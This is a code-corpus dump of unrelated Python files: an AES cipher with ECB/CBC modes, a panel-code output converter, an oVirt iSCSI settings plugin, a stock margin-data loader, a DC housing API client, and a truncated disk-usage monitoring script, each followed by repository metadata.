"""Encrypts a single block. This is the main AES function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned
self.add_round_key(block, 0)
for round in xrange(1, self.rounds):
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
self.mix_columns(block)
self.add_round_key(block, round)
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
# no mix_columns step in the last round
self.add_round_key(block, self.rounds)
def decrypt_block(self, block):
"""Decrypts a single block. This is the main AES decryption function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned
self.add_round_key(block, self.rounds)
# count rounds down from (self.rounds) ... 1
for round in xrange(self.rounds - 1, 0, -1):
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, round)
self.mix_columns_inv(block)
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, 0)
# no mix_columns step in the last round
#### ECB mode implementation
class ECBMode(object):
"""Electronic CodeBook (ECB) mode encryption.
Basically this mode applies the cipher function to each block individually;
no feedback is done. NB! This is insecure for almost all purposes
"""
def __init__(self, cipher):
self.cipher = cipher
self.block_size = cipher.block_size
def ecb(self, data, block_func):
"""Perform ECB mode with the given function"""
if len(data) % self.block_size != 0:
raise ValueError("Input length must be multiple of 16")
block_size = self.block_size
data = array('B', data)
for offset in xrange(0, len(data), block_size):
block = data[offset:offset + block_size]
block_func(block)
data[offset:offset + block_size] = block
return data.tostring()
def encrypt(self, data):
"""Encrypt data in ECB mode"""
return self.ecb(data, self.cipher.encrypt_block)
def decrypt(self, data):
"""Decrypt data in ECB mode"""
return self.ecb(data, self.cipher.decrypt_block)
#### CBC mode
class CBCMode(object):
"""
Cipher Block Chaining(CBC) mode encryption. This mode avoids content leaks.
In CBC encryption, each plaintext block is XORed with the ciphertext block
preceding it; decryption is simply the inverse.
"""
# A better explanation of CBC can be found here:
# http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#-
# Cipher-block_chaining_.28CBC.29
def __init__(self, cipher, IV):
self.cipher = cipher
self.block_size = cipher.block_size
self.IV = array('B', IV)
def encrypt(self, data):
"""Encrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError("Plaintext length must be multiple of 16")
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
block = data[offset:offset + block_size]
# Perform CBC chaining
for i in xrange(block_size):
block[i] ^= IV[i]
self.cipher.encrypt_block(block)
data[offset:offset + block_size] = block
IV = block
self.IV = IV
return data.tostring()
def decrypt(self, data):
"""Decrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError("Ciphertext length must be multiple of 16")
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
ctext = data[offset:offset + block_size]
block = ctext[:]
self.cipher.decrypt_block(block)
# Perform CBC chaining
#for i in xrange(block_size):
# data[offset + i] ^= IV[i]
for i in xrange(block_size):
block[i] ^= IV[i]
data[offset:offset + block_size] = block
IV = ctext
#data[offset : offset+block_size] = block
self.IV = IV
return data.tostring()
def galois_multiply(a, b):
"""Galois Field multiplicaiton for AES"""
p = 0
while b:
if b & 1:
p ^= a
a <<= 1
if a & 0x100:
a ^= 0x1b
b >>= 1
return p & 0xff
# Precompute the multiplication tables for encryption
gf_mul_by_2 = array('B', [galois_multiply(x, 2) for x in range(256)])
gf_mul_by_3 = array('B', [galois_multiply(x, 3) for x in range(256)])
# ... for decryption
gf_mul_by_9 = array('B', [galois_multiply(x, 9) for x in range(256)])
gf_mul_by_11 = array('B', [galois_multiply(x, 11) for x in range(256)])
gf_mul_by_13 = array('B', [galois_multiply(x, 13) for x in range(256)])
gf_mul_by_14 = array('B', [galois_multiply(x, 14) for x in range(256)])
####
# The S-box is a 256-element array, that maps a single byte value to another
# byte value. Since it's designed to be reversible, each value occurs only once
# in the S-box
#
# More information: http://en.wikipedia.org/wiki/Rijndael_S-box
aes_sbox = array(
'B',
'637c777bf26b6fc53001672bfed7ab76'
'ca82c97dfa5947f0add4a2af9ca472c0'
'b7fd9326363ff7cc34a5e5f171d83115'
'04c723c31896059a071280e2eb27b275'
'09832c1a1b6e5aa0523bd6b329e32f84'
'53d100ed20fcb15b6acbbe394a4c58cf'
'd0efaafb434d338545f9027f503c9fa8'
'51a3408f929d38f5bcb6da2110fff3d2'
'cd0c13ec5f974417c4a77e3d645d1973'
'60814fdc222a908846eeb814de5e0bdb'
'e0323a0a4906245cc2d3ac629195e479'
'e7c8376d8dd54ea96c56f4ea657aae08'
'ba78252e1ca6b4c6e8dd741f4bbd8b8a'
'703eb5664803f60e613557b986c11d9e'
'e1f8981169d98e949b1e87e9ce5528df'
'8ca1890dbfe6426841992d0fb054bb16'.decode('hex')
)
# This is the inverse of the above. In other words:
# aes_inv_sbox[aes_sbox[val]] == val
aes_inv_sbox = array(
'B',
'52096ad53036a538bf40a39e81f3d7fb'
'7ce339829b2fff87348e4344c4dee9cb'
'547b9432a6c2233dee4c950b42fac34e'
'082ea16628d924b2765ba2496d8bd125'
'72f8f66486689816d4a45ccc5d65b692'
'6c704850fdedb9da5e154657a78d9d84'
'90d8ab008cbcd30af7e45805b8b34506'
'd02c1e8fca3f0f02c1afbd0301138a6b'
'3a9111414f67dcea97f2cfcef0b4e673'
'96ac7422e7ad3585e2f937e81c75df6e'
'47f11a711d29c5896fb7620eaa18be1b'
'fc563e4bc6d279209adbc0fe78cd5af4'
'1fdda8338807c731b11210592780ec5f'
'60517fa919b54a0d2de57a9f93c99cef'
'a0e03b4dae2af5b0c8ebbb3c83539961'
'172b047eba77d626e169146355210c7d'.decode('hex')
)
# The Rcon table is used in AES's key schedule (key expansion)
# It's a pre-computed table of exponentation of 2 in AES's finite field
#
# More information: http://en.wikipedia.org/wiki/Rijndael_key_schedule
aes_Rcon = array(
'B',
'8d01020408102040801b366cd8ab4d9a'
'2f5ebc63c697356ad4b37dfaefc59139'
'72e4d3bd61c29f254a943366cc831d3a'
'74e8cb8d01020408102040801b366cd8'
'ab4d9a2f5ebc63c697356ad4b37dfaef'
'c5913972e4d3bd61c29f254a943366cc'
'831d3a74e8cb8d01020408102040801b'
'366cd8ab4d9a2f5ebc63c697356ad4b3'
'7dfaefc5913972e4d3bd61c29f254a94'
'3366cc831d3a74e8cb8d010204081020'
'40801b366cd8ab4d9a2f5ebc63c69735'
'6ad4b37dfaefc5913972e4d3bd61c29f'
'254a943366cc831d3a74e8cb8d010204'
'08102040801b366cd8ab4d9a2f5ebc63'
'c697356ad4b37dfaefc5913972e4d3bd'
'61c29f254a943366cc831d3a74e8cb'.decode('hex')
) | gpl-3.0 | -5,658,260,328,799,054,000 | 31.6778 | 79 | 0.61045 | false |
SaTa999/pyPanair | pyPanair/postprocess/agps_converter.py | 1 | 10619 | #!/usr/bin/env python
import numpy as np
import os
def read_column(file, firstline):
"""read a column from first line (e.g. n01c001) to *eof"""
column = list()
line = firstline
# register methods for faster evaluation
f_readline = file.readline
column_append = column.append
# read each line until *eof
while line:
line = f_readline().split()
if line[0] == "*eof":
break
column_append(line)
return column
def read_network(file, header):
"""read a network"""
network_n = int(header[0][1:3]) # get network number from the first header (e.g. 01 from n01c001)
# print("loading network no.", network_n)
network = list()
line = header
# register methods for faster evaluation
network_append = network.append
# read each line until next header
while line:
col = read_column(file, line)
network_append(col)
line = file.readline().split()
# break at the end of agps file
if not line:
break
# break when reaching the header for the next network (e.g. n02c001)
if not int(line[0][1:3]) == network_n:
break
network = np.array(network, dtype=float)
return network, line
def read_agps(inputfile="agps"):
# read the agps file and return a list of arrays containing data for each network
with open(inputfile, "r") as f:
# skip the header of the agps file
for _ in range(6):
f.readline()
line = f.readline().split()
f.readline() # skip the header of first network ("icol, x, y, z, cp1, cp2, cp3, cp4")
dat = []
while line:
net, line = read_network(f, line)
dat.append(net)
return dat
def write_vtk(n_wake=0, outputname="agps", inputfile="agps"):
"""Write agps in the legacy paraview format (vtk)
All networks will be merged into one block
Therefore, user are advised to omit 'wakes' by specifying the 'n_wakes'"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write the header of the vtk file
vtk = "# vtk DataFile Version 2.0\n"
vtk += "scalar\n"
vtk += "ASCII\n"
vtk += "DATASET UNSTRUCTURED_GRID\n"
n_points = 0 # number of points in vtk file
n_cells = 0 # number of quadrilateral cells formed by the points
n_cp = data[0].shape[2] - 4
points = str() # coordinate of each point (x, y, z)
point_data = [str()] * n_cp # cp at each point (cp1, cp2, cp3, cp4)
cells = str() # ids of each quadrilateral cell (e.g. (0, n_col, n_col + 1, 1) for first cell)
for i in range(len(data) - n_wake):
net = data[i]
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i + 1), net.shape)
base_square = np.array((0, n_col, n_col + 1, 1))
for j in range(n_row):
for k in range(n_col):
point = net[j, k]
# add coordinate of a point
points += "{0} {1} {2}\n".format(point[1], point[2], point[3])
# add cp data of a point
for l in range(n_cp):
point_data[l] += "{}\n".format(point[4 + l])
# add ids of a cell
if not j == n_row - 1 and not k == n_col - 1:
square = base_square + (j * n_col + k) + n_points
square = (str(p) for p in square)
cells += "4 " + " ".join(square) + "\n"
# add the number of points / cells
n_points += n_row * n_col
n_cells += (n_row - 1) * (n_col - 1)
# write the header of each block (POINTS, CELLS, CELLTYPES, POINT_DATA)
points = "POINTS {} float\n".format(n_points) + points
cells = "CELLS {0} {1}\n".format(n_cells, n_cells * 5) + cells
cell_types = "CELL_TYPES {}\n".format(n_cells) + "9\n" * n_cells
vtk += points + cells + cell_types + "POINT_DATA {}\n".format(n_points)
for l in range(n_cp):
vtk += "SCALARS cp{} float\nLOOKUP_TABLE default\n".format(l + 1) + point_data[l]
with open("{}.vtk".format(outputname), "w") as f:
f.write(vtk)
def write_vtm(n_wake=0, outputname="agps", inputfile="agps"):
"""convert agps networks to paraview unstructured grid
each network will become a different vtu file
to open all vtu files at the same time, open the vtm file with paraview"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write header of vtm file
vtm = "<?xml version=\"1.0\"?>\n"
vtm += "<VTKFile type=\"vtkMultiBlockDataSet\" version=\"1.0\" byte_order=\"LittleEndian\">\n"
vtm += " <vtkMultiBlockDataSet>\n"
for i in range(len(data) - n_wake):
# add dataset to vtm file
vtu_dir = "{}_vtu".format(outputname)
try:
os.mkdir(vtu_dir)
except OSError:
if not os.path.exists(vtu_dir):
raise
vtu_path = "{0}/{1}{2}.vtu".format(vtu_dir, outputname, i + 1)
vtm += " <DataSet index=\"network{0}\" file=\"{1}\"/>\n".format(i + 1, vtu_path)
# write header of vtu file
vtu = "<?xml version=\"1.0\"?>\n"
vtu += "<VTKFile type=\"UnstructuredGrid\" version=\"1.0\" byte_order=\"LittleEndian\">\n"
vtu += " <UnstructuredGrid>\n"
# write the header of the piece
net = data[i]
n_cp = net.shape[2] - 4
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i), net.shape)
n_points = n_row * n_col
n_cells = (n_row - 1) * (n_col - 1)
vtu += " <Piece NumberOfPoints=\"{}\" NumberOfCells=\"{}\">\n".format(n_points, n_cells)
# format the agps data
points = str() # coordinate of each point (x, y, z)
cells = str() # ids of each quadrilateral cell (e.g. (0, n_col, n_col + 1, 1) for first cell)
base_square = np.array((0, n_col, n_col + 1, 1), dtype=int)
for j in range(n_row):
for k in range(n_col):
point = net[j, k]
# add coordinate of a point
points += "{0} {1} {2}\n".format(point[1], point[2], point[3])
# add ids of a cell
if not j == n_row - 1 and not k == n_col - 1:
square = base_square + (j * n_col + k)
square = (str(p) for p in square)
cells += " ".join(square) + "\n"
# add formatted agps data to vtu
vtu += " <PointData Scalars=\"scalars\">\n"
# add point_data to vtu
for l in range(n_cp):
vtu += " <DataArray type=\"Float32\" Name=\"cp{}\" format=\"ascii\">\n".format(l + 1)
vtu += " ".join(str(cp) for cp in net[:, :, 4 + l].ravel()) + "\n"
vtu += " </DataArray>\n"
vtu += " </PointData>\n"
# add points to vtu
vtu += " <Points>\n"
vtu += " <DataArray type=\"Float32\" Name=\"network{}\" NumberOfComponents=\"3\" " \
"format=\"ascii\">\n".format(i + 1)
vtu += points
vtu += " </DataArray>\n"
vtu += " </Points>\n"
# add cells to vtu
vtu += " <Cells>\n"
vtu += " <DataArray type=\"Int32\" Name=\"connectivity\" format=\"ascii\">\n"
vtu += cells
vtu += " </DataArray>\n"
vtu += " <DataArray type=\"Int32\" Name=\"offsets\" format=\"ascii\">\n"
vtu += " ".join(str(4 * (icell + 1)) for icell in range(n_cells)) + "\n"
vtu += " </DataArray>\n"
vtu += " <DataArray type=\"Int32\" Name=\"types\" format=\"ascii\">\n"
vtu += " ".join(str(9) for _ in range(n_cells)) + "\n"
vtu += " </DataArray>\n"
vtu += " </Cells>\n"
vtu += " </Piece>\n"
vtu += " </UnstructuredGrid>\n</VTKFile>\n"
with open(vtu_path, "w") as f:
f.write(vtu)
vtm += " </vtkMultiBlockDataSet>\n</VTKFile>"
with open("{}.vtm".format(outputname), "w") as f:
f.write(vtm)
def write_tec(n_wake=0, outputname="agps", inputfile="agps"):
"""convert agps networks to tecplot finite element quadrilaterals"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write header
n_headers = data[0].shape[2] # number of headers (e.g. 8 for "irow, x, y, z, cp1, cp2, cp3, cp4")
n_cp = n_headers - 4 # number of different cps in agps file
tec = "TITLE = \"AGPS 3D Finite Element Data\"\n"
tec += "VARIABLES = \"x\", \"y\", \"z\""
for i in range(n_cp):
tec += ", \"cp{}\"".format(i + 1)
tec += "\n"
# write each network as a block
for i in range(len(data) - n_wake):
# write the header of the block
net = data[i]
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i + 1), net.shape)
n_points = n_row * n_col
n_elements = (n_row - 1) * (n_col - 1)
tec += "ZONE T=\"MIXED\", N={}, E={}, DATAPACKING=BLOCK," \
" ZONETYPE=FEQUADRILATERAL\n".format(n_points, n_elements)
# write coordinates (x, y, z) and cps (cp1, cp2, cp3, cp4) in each row
for l in range(1, n_headers):
element = net[:, :, l]
tec += " ".join(map(str, element.ravel())) + "\n"
# write the ids of each quadrilateral (e.g. (0, n_col, n_col + 1, 1) for first quadrilateral)
base_square = np.array((0, n_col, n_col + 1, 1)) + 1
# quads = str()
# for j in range(n_row-1):
# for k in range(n_col-1):
# square = base_square + (j * n_col + k)
# square = (str(p) for p in square)
# quads += " ".join(square) + "\n"
# same as the above code, but faster evaluation
quads = "\n".join("\n".join((" ".join((str(p) for p in (base_square + j * n_col + k))))
for k in range(n_col - 1))
for j in range(n_row - 1))
tec += quads
with open("{}.dat".format(outputname), "w") as f:
f.write(tec)
| mit | 7,905,887,637,318,669,000 | 41.880165 | 104 | 0.512289 | false |
jarod-w/ocsetup | ocsetup/plugins/storage_tab.py | 1 | 2968 | #!/usr/bin/python
# storage_tab.py - Copyright (C) 2012 CloudTimes, Inc.
# Written by Jarod.W <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA. A copy of the GNU General Public License is
# also available at http://www.gnu.org/copyleft/gpl.html.
import traceback
from ovirtnode.ovirtfunctions import log
from ovirtnode.iscsi import get_current_iscsi_initiator_name, \
set_iscsi_initiator
from ocsetup.wrapper_ovirtfunctions import PluginBase
from ocsetup.ocsetup_ui_widgets import ButtonList
from ocsetup.ocsetup_ui import WidgetBase, _
from ocsetup.datautil import refresh_window
class Plugin(PluginBase):
"""
Plugin for license information of IVNH.
"""
def __init__(self):
PluginBase.__init__(self, "Storage")
self.iscsi_initiator_label = None
self.iscsi_initiator_name_value = None
self.iscsi_button = None
def storage_apply(self, obj):
from ocsetup.ocsetup import ocs
log("enter storage apply")
set_iscsi_initiator(
ocs.page_Storage.iscsi_initiator_name_value_Entry.get_text())
def storage_reset(self, obj):
log("enter storage reset")
refresh_window(obj)
def form(self):
log("enter storage form function....")
try:
self.iscsi_initiator_label = WidgetBase(
"iscsi_initiator_label",
"Label",
"iSCSI Initiator Name:",
title=True)
self.iscsi_initiator_name_value = WidgetBase(
"iscsi_initiator_name_value", "Entry", "", "",
get_conf=get_current_iscsi_initiator_name)
self.iscsi_button = WidgetBase(
'iscsi_button', ButtonList, '',
params={'labels': [_('Apply'), _('Reset')],
'callback': [self.storage_apply, self.storage_reset]})
except:
log("Here some error happened.format ext: %s " %
traceback.format_exc())
return [
"Storage",
"Storage",
[
(self.iscsi_initiator_label, self.iscsi_initiator_name_value),
(WidgetBase('__', 'Label', vhelp=140),),
(self.iscsi_button,),
]]
def action(self):
pass
def get_plugin():
p = Plugin()
return p.form()
| gpl-2.0 | -7,529,631,513,802,328,000 | 33.114943 | 78 | 0.627695 | false |
cqychen/quants | quants/loaddata/skyeye_ods_invest_refer_sh_margins_detail.py | 1 | 2670 | #coding=utf8
import tushare as ts;
import pymysql;
import time as dt
from datashape.coretypes import string
from pandas.io.sql import SQLDatabase
import sqlalchemy
import datetime
from sqlalchemy import create_engine
from pandas.io import sql
import threading
import pandas as pd;
import sys
sys.path.append('../') #添加配置文件
from common_function import *
def create_table(table_name):
cmd='''
create table if not exists %s
(
opDate VARCHAR (63) comment '信用交易日期'
,stockCode varchar (63) comment '股票代码'
,securityAbbr varchar (63) comment '标的证券简称'
,rzye BIGINT comment '本日融资余额(元)'
,rzmre BIGINT comment '本日融资买入额(元)'
,rzche BIGINT comment '本日融资偿还额(元)'
,rqyl BIGINT comment '本日融券余量'
,rqmcl BIGINT comment '本日融券卖出量'
,rqchl BIGINT comment '本日融券偿还量'
,PRIMARY KEY(stockCode,`opDate`)
,index(stockCode)
)DEFAULT CHARSET=utf8
'''%table_name
print (cmd)
run_mysql_cmd(cmd,conn)
def load_data_stock(stock_code):
'''
:param stock_code:传递股票代码,将其装载进入mysql
:return:
'''
start_date = get_date_add_days(get_max_date_sh_margins_detail(stock_code), 1) #获取股票最大日期
rs = ts.sh_margin_details(start=start_date, end=end_date, symbol=stock_code)#获取数据
pd.DataFrame.to_sql(rs, table_name, con=conn, flavor='mysql', if_exists='append', index=False)
def load_data():
stock_code = get_stock_info().index
total_num = len(stock_code);
tempnum = 1;
for tmp_stock_code in stock_code:
tempnum = tempnum + 1
print(tempnum,tmp_stock_code)
load_data_stock(tmp_stock_code)
if __name__ == '__main__':
#--------------------设置基本信息---------------------------------
print("--------------加载股票日k线-----------------------------")
startTime=dt.time()
iphost,user,passwd=get_mysql_conn()
db='ods_data'
charset='utf8'
table_name='ods_invest_refer_sh_margins_detail'
conn = pymysql.connect(user=user, passwd=passwd,host=iphost, db=db,charset=charset)
end_date= dt.strftime('%Y-%m-%d',dt.localtime(dt.time()))
#--------------------脚本运行开始--------------------------------
create_table(table_name=table_name)
load_data()
endTime=dt.time()
print("---------------脚本运行完毕,共计耗费时间%sS------------------"%(endTime-startTime))
| epl-1.0 | -4,613,820,654,172,870,000 | 34.217391 | 98 | 0.577778 | false |
pfjel7/housing-insights | python/housinginsights/sources/cama.py | 1 | 8713 | # Script is deprecated, as of September 18, 2017.
# zoneUnitCount now calculated with LoadData's _get_residential_units()
#
from pprint import pprint
import os
import sys
import requests
from collections import OrderedDict
import csv
import datetime
PYTHON_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
sys.path.append(PYTHON_PATH)
from housinginsights.sources.base import BaseApiConn
from housinginsights.tools.logger import HILogger
logger = HILogger(name=__file__, logfile="sources.log")
class MarApiConn_2(BaseApiConn):
"""
API Interface to the Master Address Record (MAR) database.
Use public methods to retrieve data.
"""
BASEURL = 'http://citizenatlas.dc.gov/newwebservices/locationverifier.asmx'
def __init__(self, baseurl=None,proxies=None,database_choice=None, debug=False):
super().__init__(MarApiConn_2.BASEURL)
def get_data(self, square, lot, suffix):
"""
Get information on a location based on a simple query string.
:param square: SSL first part
:type location: String.
:param lot: SSL second part
:type location: String.
:param output_type: Output type specified by user.
:type output_type: String.
:param output_file: Output file specified by user.
:type output_file: String
:returns: Json output from the api.
:rtype: String
"""
params = {
'f': 'json',
'Square': square,
'Lot': lot,
'Suffix': suffix
}
result = self.get('/findAddFromSSL2', params=params)
if result.status_code != 200:
err = "An error occurred during request: status {0}"
logger.exception(err.format(result.status_code))
raise
mar_data = result.json()
if mar_data['returnDataset'] == {}:
mar_returns = {'Warning': 'No MAR data availble - property under construction - see AYB year'}
else:
entry = mar_data['returnDataset']['Table1'][0]
mar_returns = {'anc': entry['ANC'],
'census_tract': entry['CENSUS_TRACT'],
'neighborhood_cluster': entry['CLUSTER_'],
'ward': entry['WARD'],
'zip': entry['ZIPCODE']
}
return mar_returns
class CamaApiConn(BaseApiConn):
"""
API Interface to the Computer Assisted Mass Appraisal - Residential (CAMA)
API, to obtain SSL numbers to use as input for the MarApiConn_2 and get
the corresponding housing and bedroom units.
"""
BASEURL = 'https://opendata.arcgis.com/datasets'
def __init__(self):
super().__init__(CamaApiConn.BASEURL)
def get_data(self):
"""
Grabs data from CAMA. Individual CAMA property retrieves zone_type data
from MAR api. Count number of housing units and bedroom units per zone.
Return the count data (in dictionary form) to be processed into csv
by get_csv() method.
"""
logger.info("Starting CAMA")
mar_api = MarApiConn_2()
result = self.get(urlpath='/c5fb3fbe4c694a59a6eef7bf5f8bc49a_25.geojson', params=None)
if result.status_code != 200:
err = "An error occurred during request: status {0}"
raise Exception(err.format(result.status_code))
cama_data = result.json()
logger.info(" Got cama_data. Length:{}".format(len(cama_data['features'])))
"""
Example of: anc_count = [OrderedDict([('zone_type', 'anc'), ('zone', 'ANC 2B'),
('housing_unit_count', 10), ('bedroom_unit_count', 10)], etc)]
"""
zone_types = ['anc', 'census_tract', 'neighborhood_cluster', 'ward', 'zip']
anc_count = []
census_count = []
cluster_count = []
ward_count = []
zipcode_count = []
"""
Take each CAMA property data and retrieve the MAR data.
"""
"""
Certain square values have four digits + a letter. (ex. 8888E)
Square would be the first four digits and suffix would be the letter.
SSL sometimes comes as 8 digit string without spacing in the middle.
"""
"""
CAMA data includes bldgs under construction. CAMA's data includes AYB of 2018
as of June 2017. We eliminate all data points that are under construction and
don't provide any housing units and bedrm at this time.
"""
for index, row in enumerate(cama_data['features']):
if (index % 1000 == 0):
print(" currently at index {}".format(index))
try:
current_year = int(datetime.date.today().strftime('%Y'))
#Skipping none values for units under construction
if row['properties']['AYB'] is not None and int(row['properties']['AYB']) > current_year:
continue
objectid = row['properties']['OBJECTID']
if len(row['properties']['SSL']) == 8:
square = row['properties']['SSL'][:4]
lot = row['properties']['SSL'][4:]
else:
square, lot = row['properties']['SSL'].split()
suffix = ' '
if len(square) > 4:
square = square[:4]
suffix = square[-1]
mar_return = mar_api.get_data(square, lot, suffix)
''' Count the housing units and bedrooms '''
num_units = 0
if row['properties']['NUM_UNITS']: num_units = row['properties']['NUM_UNITS']
if num_units == 0:
num_units = 1
bedrm = row['properties']['BEDRM']
if bedrm == 0: bedrm = 1
if bedrm == None: bedrm = 0
for zone in zone_types:
if zone == 'anc': zone_count = anc_count
elif zone == 'census_tract': zone_count = census_count
elif zone == 'neighborhood_cluster': zone_count = cluster_count
elif zone == 'ward': zone_count = ward_count
elif zone == 'zip': zone_count = zipcode_count
if 'Warning' not in mar_return.keys():
flag = False
for dictionary in zone_count: #dictionary is {'zone_type': 'ANC', 'zone': 'ANC 8A', etc.}
if dictionary['zone'] == mar_return[zone]: #mar_return[ANC] is 'ANC 8A'
dictionary['housing_unit_count'] += num_units
dictionary['bedroom_unit_count'] += bedrm
flag = True
break
if not flag:
zone_count.append( OrderedDict([('zone_type', zone), ('zone', mar_return[zone]), ('housing_unit_count', num_units), ('bedroom_unit_count', bedrm)]) )
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
print(exc_type, "line", exc_tb.tb_lineno)
print("Error! SSL: ", row['properties']['SSL'], row['properties']['AYB'])
continue
return {'anc': anc_count, 'census_tract': census_count, 'neighborhood_cluster': cluster_count, 'ward': ward_count, 'zip': zipcode_count}
def get_csv(self):
"""
Takes the returned dictionary from get_data() and convert the information
into csv file and then save the csv file in
housing-insights/data/processed/zoneUnitCount
as zoneUnitCount_2017-05-30.csv.
"""
if not os.path.exists('../../../data/processed/zoneUnitCount'):
os.makedirs('../../../data/processed/zoneUnitCount')
data_processed_zoneUnitCount = os.path.join(PYTHON_PATH, os.pardir, 'data', 'processed', 'zoneUnitCount')
zone_data = self.get_data()
toCSV = []
date = datetime.date.today().strftime('%Y-%m-%d')
filename = os.path.join(data_processed_zoneUnitCount, 'zoneUnitCount_'+date+'.csv')
for key, value in zone_data.items():
toCSV.extend(value)
keys = toCSV[0].keys()
with open(filename, 'w') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(toCSV)
if __name__ == '__main__':
# Pushes everything from the logger to the command line output as well.
my_api = CamaApiConn()
csvfile = my_api.get_csv()
| mit | -8,037,650,862,094,938,000 | 38.425339 | 177 | 0.553655 | false |
pmalczuk/python_scripts | disk.py | 1 | 7360 | #!/usr/bin/python2
import os, sys
import getopt, datetime
import platform
#automatyczne przeliczenie wartosci od Bajtow w gore
def GetHumanReadable(size,precision=2):
suffixes=['B','KB','MB','GB','TB']
suffixIndex = 0
while size > 1024 and suffixIndex < 3:
suffixIndex += 1 #increment the index of the suffix
size = size/1024.0 #apply the division
return "%.*f%s"%(precision,size,suffixes[suffixIndex])
#sprawdzenie punktu montowania
def getmount(path):
path = os.path.realpath(os.path.abspath(path))
if path == '/boot/efi':
return path
while path != os.path.sep:
if os.path.ismount(path):
return path
path = os.path.abspath(os.path.join(path, os.pardir))
return path
#parametry uzycia dyskow zwracane w formie dictionary
def disk_usage(path):
st = os.statvfs(path)
free = st.f_bavail * st.f_frsize
total = st.f_blocks * st.f_frsize
used = (st.f_blocks - st.f_bfree) * st.f_frsize
used_percent=float(used)/total*100
itotal = st.f_files
ifree = st.f_ffree
iused = st.f_files - st.f_ffree
try: iused_percent=float(iused)/itotal*100
except:
iused_percent=1
return {path: {'total': total,'used': used,'free': free,'used_percent': used_percent, 'itotal': itotal,'ifree': ifree,'iused_percent': iused_percent, 'iused': iused}}
#usuwanie duplikatow w liscie
def make_unique(original_list):
unique_list = []
[unique_list.append(obj) for obj in original_list if obj not in unique_list]
return unique_list
def usage():
print """python check_disk.py -p [--partition=] -w [--warning=] -c [--critical] -C [--icritical] -W [--iwarning] -m [--megabytes] --gwarning --gcritical
Przyklad:
./check_disk.py -p / -w 10 -c 20 -p /boot -w 11 -c 21 -p /tmp -w 11 -c 22 -p /opt -p /var -p /var/log -p /var/log/audit -W 10 -C 5
Trzeba pamietac zeby progi dawac od razu przy danym fs od lewej do prawej tzn.
./check_disk.py -p / -w 10 -c 20 -p /boot -w 11 -c 21 -p /tmp -W 10 -C 5 --gwarning 10 --gcritical 20 >>>> to jest poprawne
./check_disk.py -p / -w 10 -c 20 -p /boot -p /tmp -W 10 -C 5 --gwarning 10 --gcritical 20 >>> to jest nie poprawne
"""
sys.exit()
def main():
partitions_args=[]
warnings_args=[]
criticals_args=[]
mega=0
try:
opts, args = getopt.getopt(sys.argv[1:], 'hw:c:p:W:C:m',
['help','warning=','critical=','partition=','iwarning=','icritical=','megabytes','gwarning=','gcritical='])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ("-w", "--warning"):
warnings_args.append(int(arg))
elif opt in ("-c", "--critical"):
criticals_args.append(int(arg))
elif opt in ("-p", "--partition"):
partitions_args.append(arg)
elif opt in ("-W", "--iwarning"):
iwarning=int(arg)
elif opt in ("-C", "--icritical"):
icritical=int(arg)
elif opt in ("-m", '--megabytes'):
mega=1
elif opt in ('--gwarning'):
gwarn=int(arg)
elif opt in ('--gcritical'):
gcrit=int(arg)
else:
usage()
part_result=[]
new_warning=[]
new_critical=[]
part_not_distinct=[]
for partition in partitions_args:
part_not_distinct.append(getmount(partition)) # sprawdzenie punktow montowania podanych partycji
part_distinct=make_unique(part_not_distinct) #usuwanie duplikatow punktow montowania
for mountpoint in part_distinct:
part_result.append(disk_usage(mountpoint)) #sprawdzenie zajetosci per istniejacy punkt montowania
#print warnings_args[partitions_args.index(mountpoint)]
try:
new_warning.append(warnings_args[part_distinct.index(mountpoint)]) # ustalenie progow warning
new_critical.append(criticals_args[part_distinct.index(mountpoint)]) # ustalenie progow critical
except IndexError:
new_warning.append(gwarn) # ustalenie progow global warning
new_critical.append(gcrit) # ustalenie progow global critical
perfdata=""
outputOK=""
outputWARN=""
outputCRIT=""
outputINODE=""
i=0
crit=0
warn=0
try: gwarn,gcrit
except NameError as e:
pass
#wyswietlanie i wyliczanie
if mega == 0: #procent used
for element in part_result:
for tag,value in element.items():
p_used=value['used_percent']
if p_used > float(new_critical[i]):
outputCRIT+=tag+"="+GetHumanReadable(value['free'])+" "
crit=1
elif p_used > float(new_warning[i]):
outputWARN+=tag+"="+GetHumanReadable(value['free'])+" "
warn=1
else:
outputOK+=tag+"="+GetHumanReadable(value['free'])+" "
#sprawdzenie inode used
if value['iused_percent'] > float(icritical):
outputINODE+=tag+" InodeCRIT "+format(value['iused_percent'],'.2f')+" "
crit=1
elif value['iused_percent'] > float(iwarning):
outputINODE+=tag+" InodeWARN "+format(value['iused_percent'],'.2f')+" "
